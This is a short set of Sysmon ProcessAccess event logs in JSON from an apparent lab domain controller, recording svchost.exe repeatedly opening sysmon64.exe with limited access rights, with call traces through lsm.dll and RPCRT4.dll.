{"EventTime":"2020-08-01 05:48:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3813,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:51.533\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:51.533","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3814,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:51.533\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:51.533","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3815,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:51.533\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:51.533","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3816,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:51.533\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:51.533","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3817,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:51.533\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:51.533","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3818,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:51.533\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:51.533","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3819,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:51.533\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:51.533","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3820,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:51.533\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:51.533","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
